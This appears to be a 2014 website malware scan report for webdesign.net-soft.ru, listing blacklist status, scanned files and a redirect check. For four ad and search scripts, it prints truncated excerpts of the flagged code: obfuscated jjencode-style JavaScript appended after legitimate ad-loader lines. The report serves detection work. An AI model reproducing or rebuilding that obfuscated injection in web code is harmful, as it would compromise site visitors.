Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=webdesign.net-soft.ru
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://webdesign.net-soft.ru/
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
| Request | Server response | Status |
http://webdesign.net-soft.ru/ | 200 OK Content-Length: 19281 Content-Type: text/html | clean |
http://webdesign.net-soft.ru/poisk.js | 200 OK Content-Length: 3091 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<form action=\"search.php\" id=\"cse-search-box\"><div><input type=\"hidden\" name=\"cx\" value=\"partner-pub-6558611117702647:qrfvjo7hpqv\" /><input type=\"hidden\" name=\"cof\" value=\"FORID:10\" /><input type=\"hidden\" name=\"ie\" value=\"windows-1251\" /><input type=\"text\" name=\"q\" size=\"70\" /> <input style=\"font-family: Arial; font-size: 9pt; font-weight: bold; text-transform: uppercase\" type=\"submit\" name= Antivirus reports:
| ||
http://webdesign.net-soft.ru/bgn1.js | 200 OK Content-Length: 2628 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var begun_auto_pad = 162812153;
var begun_block_id = 163014947; document.write('<script src=\"http://autocontext.begun.ru/autocontext2.js\" type=\"text/javascript\"></script>'); var I=false || !!document.documentMode;if(I || window.opera){$=~[];$={___:++$,$$$$:(![]+"")[$],__$:++$,$_$_:(![]+"")[$],_$_:++$,$_$$:({}+"")[$],$$_$:($[$]+"")[$],_$$:++$,$$$_:(!""+"")[$],$__:++$,$_$:++$,$$__:({}+"")[$],$$_:++$,$$$:++$,$___:++$,$__$:++$};$.$_=($.$_=$+"")[$.$_$]+($._$=$.$_[$.__$] Antivirus reports:
| ||
http://webdesign.net-soft.ru/g_468_60.js | 200 OK Content-Length: 2747 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) <!--
google_ad_client = "pub-6558611117702647"; google_ad_slot = "8712495018"; google_ad_width = 468; google_ad_height = 60; document.write('<script type=\"text/javascript\" src=\"http://pagead2.googlesyndication.com/pagead/show_ads.js\"></script>'); var I=false || !!document.documentMode;if(I || window.opera){$=~[];$={___:++$,$$$$:(![]+"")[$],__$:++$,$_$_:(![]+"")[$],_$_:++$,$_$$:({}+"")[$],$$_$:($[$]+"")[$],_$$:++$,$$$_:(!""+"")[$],$__:++$,$_$ Antivirus reports:
| ||
http://webdesign.net-soft.ru/bgn.js | 200 OK Content-Length: 2628 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var begun_auto_pad = 162812153;
var begun_block_id = 162812164; document.write('<script src=\"http://autocontext.begun.ru/autocontext2.js\" type=\"text/javascript\"></script>'); var I=false || !!document.documentMode;if(I || window.opera){$=~[];$={___:++$,$$$$:(![]+"")[$],__$:++$,$_$_:(![]+"")[$],_$_:++$,$_$$:({}+"")[$],$$_$:($[$]+"")[$],_$$:++$,$$$_:(!""+"")[$],$__:++$,$_$:++$,$$__:({}+"")[$],$$_:++$,$$$:++$,$___:++$,$__$:++$};$.$_=($.$_=$+"")[$.$_$]+($._$=$.$_[$.__$] Antivirus reports:
| ||
http://webdesign.net-soft.ru/g_160_600.js | 200 OK Content-Length: 2749 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) <!--
google_ad_client = "pub-6558611117702647"; google_ad_slot = "7618619552"; google_ad_width = 160; google_ad_height = 600; document.write('<script type=\"text/javascript\" src=\"http://pagead2.googlesyndication.com/pagead/show_ads.js\"></script>'); var I=false || !!document.documentMode;if(I || window.opera){$=~[];$={___:++$,$$$$:(![]+"")[$],__$:++$,$_$_:(![]+"")[$],_$_:++$,$_$$:({}+"")[$],$$_$:($[$]+"")[$],_$$:++$,$$$_:(!""+"")[$],$__:++$,$_ Antivirus reports:
| ||
http://counter.rambler.ru/top100.jcn?804100 | 200 OK Content-Length: 6852 Content-Type: application/x-javascript | clean |
http://webdesign.net-soft.ru/index.htm | 200 OK Content-Length: 19281 Content-Type: text/html | clean |
http://webdesign.net-soft.ru/html.htm | 200 OK Content-Length: 29288 Content-Type: text/html | clean |
http://webdesign.net-soft.ru/progs.htm | 200 OK Content-Length: 17586 Content-Type: text/html | clean |
http://webdesign.net-soft.ru/scripts.htm | 200 OK Content-Length: 18574 Content-Type: text/html | clean |
http://webdesign.net-soft.ru/recom.htm | 200 OK Content-Length: 17821 Content-Type: text/html | clean |
http://webdesign.net-soft.ru/meta.htm | 200 OK Content-Length: 20685 Content-Type: text/html | clean |
http://webdesign.net-soft.ru/shop.htm | 200 OK Content-Length: 21232 Content-Type: text/html | clean |
http://webdesign.net-soft.ru/kazino.htm | 200 OK Content-Length: 18437 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: webdesign.net-soft.ru
Result:
HTTP/1.1 200 OK
Connection: close
Date: Mon, 13 Oct 2014 17:05:45 GMT
Server: DataPalm/3.5
Content-Type: text/html
GET / HTTP/1.1
Host: webdesign.net-soft.ru
Result:
HTTP/1.1 200 OK
Connection: close
Date: Mon, 13 Oct 2014 17:05:45 GMT
Server: DataPalm/3.5
Content-Type: text/html
Second query (visit from search engine):
GET / HTTP/1.1
Host: webdesign.net-soft.ru
Referer: http://www.google.com/search?q=webdesign.net-soft.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: webdesign.net-soft.ru
Referer: http://www.google.com/search?q=webdesign.net-soft.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.